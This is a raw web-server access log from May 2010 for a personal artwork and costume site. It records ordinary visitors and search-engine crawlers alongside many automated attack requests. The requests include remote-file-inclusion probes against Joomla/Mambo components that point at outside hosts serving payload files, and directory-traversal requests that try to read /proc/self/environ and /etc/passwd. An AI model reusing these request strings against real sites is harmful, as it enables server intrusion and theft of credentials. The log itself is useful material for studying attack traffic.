121.190.102.21 - - [10/May/2010:20:35:48 -0500] "GET /logs//component/option,com_facileforms///components/com_facileforms//show_image_in_imgtag.php?mosConfig.absolute.path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 377 "-""Mozilla/5.0"
121.190.102.21 - - [10/May/2010:20:35:48 -0500] "GET //component/option,com_facileforms///components/com_facileforms//show_image_in_imgtag.php?mosConfig.absolute.path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 372 "-""Mozilla/5.0"
121.190.102.21 - - [10/May/2010:20:37:02 -0500] "GET /logs/index.php?option=com_facileforms//show_image_in_imgtag.php?mosConfig.absolute.path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
121.190.102.21 - - [10/May/2010:20:37:02 -0500] "GET /index.php?option=com_facileforms//show_image_in_imgtag.php?mosConfig.absolute.path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
121.190.102.21 - - [10/May/2010:20:37:02 -0500] "GET /logs/access_log.1268956800%20%20/index.php?option=com_facileforms//show_image_in_imgtag.php?mosConfig.absolute.path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
67.195.112.180 - - [10/May/2010:20:37:09 -0500] "GET /logs/access_log.1164844800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [10/May/2010:20:40:56 -0500] "GET /logs/access_log.1193270400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.230 - - [10/May/2010:20:42:35 -0500] "GET /logs/access_log.1169683200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [10/May/2010:20:42:47 -0500] "GET /logs/access_log.1164412800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
217.160.4.44 - - [10/May/2010:20:43:46 -0500] "GET /logs/access_log.1242432000%20%20//include/bbs.lib.inc.php?site_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt???? HTTP/1.1" 404 337 "-""Mozilla/5.0"
217.160.4.44 - - [10/May/2010:20:43:46 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
217.160.4.44 - - [10/May/2010:20:43:46 -0500] "GET //include/bbs.lib.inc.php?site_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt???? HTTP/1.1" 404 308 "-""Mozilla/5.0"
217.160.4.44 - - [10/May/2010:20:45:08 -0500] "GET //include/bbs.lib.inc.php?site_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt???? HTTP/1.1" 404 308 "-""Mozilla/5.0"
217.160.4.44 - - [10/May/2010:20:45:08 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
217.160.4.44 - - [10/May/2010:20:45:08 -0500] "GET /logs/access_log.1242432000%20%20//include/bbs.lib.inc.php?site_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt???? HTTP/1.1" 404 337 "-""Mozilla/5.0"
216.129.119.42 - - [10/May/2010:20:47:03 -0500] "GET /logs/access_log.1241827200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
121.190.102.21 - - [10/May/2010:20:47:42 -0500] "GET //index.php?option=com_sefservicemap&Itemid=&mosConfig.absolute.path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
121.190.102.21 - - [10/May/2010:20:47:42 -0500] "GET /logs/access_log.1263859200//index.php?option=com_sefservicemap&Itemid=&mosConfig.absolute.path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
121.190.102.21 - - [10/May/2010:20:47:42 -0500] "GET /logs//index.php?option=com_sefservicemap&Itemid=&mosConfig.absolute.path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
207.46.204.191 - - [10/May/2010:20:50:35 -0500] "GET /logs/access_log.1204848000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [10/May/2010:20:53:50 -0500] "GET /logs/access_log.1268956800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
72.26.122.245 - - [10/May/2010:20:55:07 -0500] "GET /pm_path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
72.26.122.245 - - [10/May/2010:20:55:07 -0500] "GET /logs/access_log.1263340800/pm_path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 377 "-""Mozilla/5.0"
72.26.122.245 - - [10/May/2010:20:55:07 -0500] "GET /logs/pm_path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
72.26.122.245 - - [10/May/2010:20:55:11 -0500] "GET /logs/access_log.1264032000/pm_path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 377 "-""Mozilla/5.0"
207.46.13.96 - - [10/May/2010:20:55:35 -0500] "GET /logs/access_log.1233446400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.185 - - [10/May/2010:21:02:29 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [10/May/2010:21:04:45 -0500] "GET /logs/access_log.1235174400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.195.242 - - [10/May/2010:21:05:35 -0500] "GET /logs/access_log.1157587200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.52.35.234 - - [10/May/2010:21:06:14 -0500] "GET /news.php?action=http://dozo.rgr.jp/ping/.../com_sef/1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
87.250.255.243 - - [10/May/2010:21:08:19 -0500] "GET /logs/access_log.1226275200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
74.52.35.234 - - [10/May/2010:21:09:43 -0500] "GET /logs/news.php?action=http://dozo.rgr.jp/ping/.../com_sef/1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
74.52.35.234 - - [10/May/2010:21:09:43 -0500] "GET /logs/access_log.1273190400/news.php?action=http://dozo.rgr.jp/ping/.../com_sef/1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
208.80.193.42 - - [10/May/2010:21:10:22 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; YPC 3.2.0; .NET CLR 1.1.4322; yplus 5.3.03b)"
81.176.232.102 - - [10/May/2010:21:10:26 -0500] "GET //index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
67.195.112.180 - - [10/May/2010:21:11:34 -0500] "GET /logs/access_log.1163635200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
173.58.143.37 - - [10/May/2010:21:12:49 -0500] "GET /artwork/index.htm HTTP/1.1" 200 11078 "http://surgeonmarta.com/hokahoka/""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
173.58.143.37 - - [10/May/2010:21:12:49 -0500] "GET /artwork/teagle.jpg HTTP/1.1" 200 4731 "http://tomdolan.pconline.com/artwork/index.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
173.58.143.37 - - [10/May/2010:21:12:49 -0500] "GET /artwork/tblocks2.jpg HTTP/1.1" 200 6812 "http://tomdolan.pconline.com/artwork/index.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
173.58.143.37 - - [10/May/2010:21:12:49 -0500] "GET /artwork/tcarousel4.jpg HTTP/1.1" 200 7475 "http://tomdolan.pconline.com/artwork/index.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
173.58.143.37 - - [10/May/2010:21:12:49 -0500] "GET /artwork/tmgblkpz1.jpg HTTP/1.1" 200 3807 "http://tomdolan.pconline.com/artwork/index.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
173.58.143.37 - - [10/May/2010:21:12:49 -0500] "GET /artwork/tinvisible1.jpg HTTP/1.1" 200 5429 "http://tomdolan.pconline.com/artwork/index.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
173.58.143.37 - - [10/May/2010:21:12:49 -0500] "GET /artwork/tdylan-tenement1a.jpg HTTP/1.1" 200 5826 "http://tomdolan.pconline.com/artwork/index.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
173.58.143.37 - - [10/May/2010:21:12:49 -0500] "GET /artwork/tplayhouse-h15.jpg HTTP/1.1" 200 8241 "http://tomdolan.pconline.com/artwork/index.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
173.58.143.37 - - [10/May/2010:21:12:50 -0500] "GET /artwork/tartmaster-side2d.jpg HTTP/1.1" 200 4141 "http://tomdolan.pconline.com/artwork/index.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
173.58.143.37 - - [10/May/2010:21:12:50 -0500] "GET /artwork/tUncleSam_mirror.jpg HTTP/1.1" 200 7361 "http://tomdolan.pconline.com/artwork/index.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
173.58.143.37 - - [10/May/2010:21:12:50 -0500] "GET /artwork/tcaboose-trunk.jpg HTTP/1.1" 200 4548 "http://tomdolan.pconline.com/artwork/index.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
173.58.143.37 - - [10/May/2010:21:12:50 -0500] "GET /artwork/tfishchair1.jpg HTTP/1.1" 200 5054 "http://tomdolan.pconline.com/artwork/index.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
173.58.143.37 - - [10/May/2010:21:12:50 -0500] "GET /artwork/tcart.jpg HTTP/1.1" 200 5518 "http://tomdolan.pconline.com/artwork/index.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
173.58.143.37 - - [10/May/2010:21:12:50 -0500] "GET /artwork/tark-menorrah.jpg HTTP/1.1" 200 6512 "http://tomdolan.pconline.com/artwork/index.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
173.58.143.37 - - [10/May/2010:21:12:50 -0500] "GET /artwork/tbig-catch-diorama.jpg HTTP/1.1" 200 8571 "http://tomdolan.pconline.com/artwork/index.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
173.58.143.37 - - [10/May/2010:21:12:50 -0500] "GET /artwork/tjewelrybox-ballerina1.jpg HTTP/1.1" 200 3689 "http://tomdolan.pconline.com/artwork/index.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
173.58.143.37 - - [10/May/2010:21:12:50 -0500] "GET /artwork/tunclesamwhilrligig.jpg HTTP/1.1" 200 6165 "http://tomdolan.pconline.com/artwork/index.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
173.58.143.37 - - [10/May/2010:21:12:50 -0500] "GET /artwork/tcattar.jpg HTTP/1.1" 200 4023 "http://tomdolan.pconline.com/artwork/index.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
173.58.143.37 - - [10/May/2010:21:12:50 -0500] "GET /artwork/tmobile-gun.jpg HTTP/1.1" 200 6391 "http://tomdolan.pconline.com/artwork/index.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
173.58.143.37 - - [10/May/2010:21:12:52 -0500] "GET /artwork/tUncleSam_mirror.jpg HTTP/1.1" 200 7361 "http://tomdolan.pconline.com/artwork/index.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
173.58.143.37 - - [10/May/2010:21:12:52 -0500] "GET /artwork/tmobile-gun.jpg HTTP/1.1" 200 6391 "http://tomdolan.pconline.com/artwork/index.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
173.58.143.37 - - [10/May/2010:21:12:53 -0500] "GET /artwork/tpig_9men.jpg HTTP/1.1" 200 8552 "http://tomdolan.pconline.com/artwork/index.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
173.58.143.37 - - [10/May/2010:21:12:53 -0500] "GET /artwork/tcat-cofin.jpg HTTP/1.1" 200 7218 "http://tomdolan.pconline.com/artwork/index.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
173.58.143.37 - - [10/May/2010:21:12:53 -0500] "GET /artwork/gate.png HTTP/1.1" 200 47886 "http://tomdolan.pconline.com/artwork/index.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
173.58.143.37 - - [10/May/2010:21:17:51 -0500] "GET /artwork/gate.png HTTP/1.1" 200 32768 "http://tomdolan.pconline.com/artwork/index.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
173.58.143.37 - - [10/May/2010:21:17:51 -0500] "GET /artwork/can-usa-mex-postcard1.jpg HTTP/1.1" 200 32768 "http://tomdolan.pconline.com/artwork/index.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
173.58.143.37 - - [10/May/2010:21:17:53 -0500] "GET /artwork/can-usa-mex-postcard1.jpg HTTP/1.1" 200 51803 "http://tomdolan.pconline.com/artwork/index.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
67.195.112.180 - - [10/May/2010:21:20:17 -0500] "GET /logs/access_log.1157155200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [10/May/2010:21:22:50 -0500] "GET /logs/access_log.1235520000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.241 - - [10/May/2010:21:25:35 -0500] "GET /logs/access_log.1262390400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
114.108.151.149 - - [10/May/2010:21:29:21 -0500] "GET /logs/access_log.1265760000///skin/inrize_blue/setup.php?dir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
114.108.151.149 - - [10/May/2010:21:29:21 -0500] "GET /logs///skin/inrize_blue/setup.php?dir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
114.108.151.149 - - [10/May/2010:21:29:21 -0500] "GET ///skin/inrize_blue/setup.php?dir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
114.108.151.149 - - [10/May/2010:21:29:24 -0500] "GET /logs/access_log.1265760000///skin/inrize_blue/setup.php?dir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
114.108.151.149 - - [10/May/2010:21:29:25 -0500] "GET /logs///skin/inrize_blue/setup.php?dir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
114.108.151.149 - - [10/May/2010:21:29:25 -0500] "GET ///skin/inrize_blue/setup.php?dir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
114.108.151.149 - - [10/May/2010:21:29:49 -0500] "GET /logs/access_log.1264118400///skin/inrize_blue/setup.php?dir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
114.108.151.149 - - [10/May/2010:21:29:53 -0500] "GET /logs/access_log.1264118400///skin/inrize_blue/setup.php?dir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
81.176.232.102 - - [10/May/2010:21:30:44 -0500] "GET /logs/access_log.1273190400//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.831"
81.176.232.102 - - [10/May/2010:21:30:45 -0500] "GET //index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
81.176.232.102 - - [10/May/2010:21:30:45 -0500] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.831"
81.176.232.102 - - [10/May/2010:21:31:14 -0500] "GET /logs/access_log.1272067200//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.831"
218.149.84.14 - - [10/May/2010:21:31:43 -0500] "GET /avatar.php?page=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
218.149.84.14 - - [10/May/2010:21:31:43 -0500] "GET /logs/avatar.php?page=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
218.149.84.14 - - [10/May/2010:21:31:43 -0500] "GET /logs/access_log.1270857600%20%20/avatar.php?page=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
218.149.84.14 - - [10/May/2010:21:31:44 -0500] "GET /avatar.php?page=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
218.149.84.14 - - [10/May/2010:21:31:44 -0500] "GET /logs/access_log.1270857600%20%20/avatar.php?page=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
218.149.84.14 - - [10/May/2010:21:31:44 -0500] "GET /logs/avatar.php?page=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
87.250.255.243 - - [10/May/2010:21:34:08 -0500] "GET /logs/access_log.1204848000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
121.254.228.21 - - [10/May/2010:21:37:23 -0500] "GET //?root=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
121.254.228.21 - - [10/May/2010:21:37:23 -0500] "GET /logs/access_log.1264982400//?root=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
121.254.228.21 - - [10/May/2010:21:37:23 -0500] "GET /logs//?root=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 5135 "-""Mozilla/5.0"
121.254.228.21 - - [10/May/2010:21:37:32 -0500] "GET /logs/access_log.1263772800//?root=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
207.7.108.203 - - [10/May/2010:21:37:56 -0500] "GET /logs//com_color/admin.color.php?mosConfig_live_site=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 315 "-""libwww-perl/5.803"
207.7.108.203 - - [10/May/2010:21:37:56 -0500] "GET //com_color/admin.color.php?mosConfig_live_site=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 310 "-""libwww-perl/5.803"
216.227.221.228 - - [10/May/2010:21:38:23 -0500] "GET /logs//com_color/admin.color.php?mosConfig_live_site=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 315 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
216.227.221.228 - - [10/May/2010:21:38:23 -0500] "GET //com_color/admin.color.php?mosConfig_live_site=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
67.195.112.180 - - [10/May/2010:21:38:25 -0500] "GET /logs/access_log.1170374400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
174.121.67.233 - - [10/May/2010:21:38:35 -0500] "GET /logs//com_color/admin.color.php?mosConfig_live_site=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 315 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
174.121.67.233 - - [10/May/2010:21:38:35 -0500] "GET //com_color/admin.color.php?mosConfig_live_site=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
216.127.70.140 - - [10/May/2010:21:40:38 -0500] "GET //index2.php?option=com_feederator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.65"
216.127.70.140 - - [10/May/2010:21:40:47 -0500] "GET /logs//index2.php?option=com_feederator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.65"
216.127.70.140 - - [10/May/2010:21:40:47 -0500] "GET //index2.php?option=com_feederator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.65"
208.115.111.248 - - [10/May/2010:21:41:56 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
203.115.131.17 - - [10/May/2010:21:42:26 -0500] "GET /logs//index2.php?option=com_feederator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.65"
203.115.131.17 - - [10/May/2010:21:42:27 -0500] "GET //index2.php?option=com_feederator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.65"
216.127.70.140 - - [10/May/2010:21:42:45 -0500] "GET /logs//index2.php?option=com_feederator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.65"
216.127.70.140 - - [10/May/2010:21:42:45 -0500] "GET //index2.php?option=com_feederator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.65"
216.129.119.43 - - [10/May/2010:21:43:27 -0500] "GET /logs/access_log.1263859200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
203.115.131.17 - - [10/May/2010:21:44:04 -0500] "GET //index2.php?option=com_feederator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.65"
216.129.119.43 - - [10/May/2010:21:44:40 -0500] "GET /logs/access_log.1236038400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
173.18.214.163 - - [10/May/2010:21:46:03 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "http://www.ravensgard.org/gerekr/costume.html""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
173.18.214.163 - - [10/May/2010:21:46:03 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
173.18.214.163 - - [10/May/2010:21:46:03 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
173.18.214.163 - - [10/May/2010:21:46:03 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
173.18.214.163 - - [10/May/2010:21:46:08 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
173.18.214.163 - - [10/May/2010:21:46:11 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
173.18.214.163 - - [10/May/2010:21:46:22 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
173.18.214.163 - - [10/May/2010:21:46:26 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21829 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
173.18.214.163 - - [10/May/2010:21:47:11 -0500] "GET /costume/thmb2.htm HTTP/1.1" 200 3962 "http://tomdolan.pconline.com/costume/index1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
173.18.214.163 - - [10/May/2010:21:47:12 -0500] "GET /costume/013_JPG%20copy.jpg HTTP/1.1" 200 49391 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
